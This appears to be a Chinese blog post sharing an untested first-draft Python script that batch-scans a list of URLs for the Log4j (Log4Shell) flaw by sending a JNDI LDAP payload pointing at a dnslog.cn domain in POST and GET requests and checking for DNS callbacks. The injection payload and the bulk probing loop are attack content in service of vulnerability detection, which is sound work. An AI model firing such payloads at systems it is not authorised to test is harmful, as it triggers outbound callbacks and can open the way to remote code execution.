Apache Log4j任意代码执行高危漏洞远程批量检测脚本（脚本为初版，未经过测试）

连续工作了十二天，本来想着周五能轻松一点，结果来了这个漏洞，要检测一大批资产，看了一下复现方法，然后写了个脚本检测，利用dnslog回显检测，不过只是单纯post和get payload而已（只能针对网站把用户提交的错误数据全部写到日志的情况进行检测）。然后，，，扫不出来，只能手工了。后续有环境在修改，读者也可自行修改，循环遍历一下参数字典。

import requests
from urllib.parse import quote
url="http://dnslog.cn/getdomain.php"
url1="http://dnslog.cn/getrecords.php"
file=input("请输入url文件保存路径：");#"C:\\Users\\ASUS\\Desktop\\ces1.txt";
with open(file,"r") as file1:
    for i in file1.readlines():
        data1 = "${jndi:ldap://"
        header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"}
        request=requests.get(url,headers=header)
        cookie=request.headers["Set-Cookie"]
        respone=request.content.decode("utf-8")
        data1=data1+respone+"/exp}";
        data=[data1,quote(data1,'utf-8')]
        url3=i.strip('\n');
        try:
            for data2 in data:
                request1 = requests.post(url3, data=data2,timeout=3);
                request1 = requests.get(url3, data=data2,timeout=3);
        except:
            flag=1;
        header["Cookie"]=cookie;
        request1=requests.get(url1,headers=header)
        if request1.content.decode("utf-8")!="[]":
            print(url+"存在漏洞")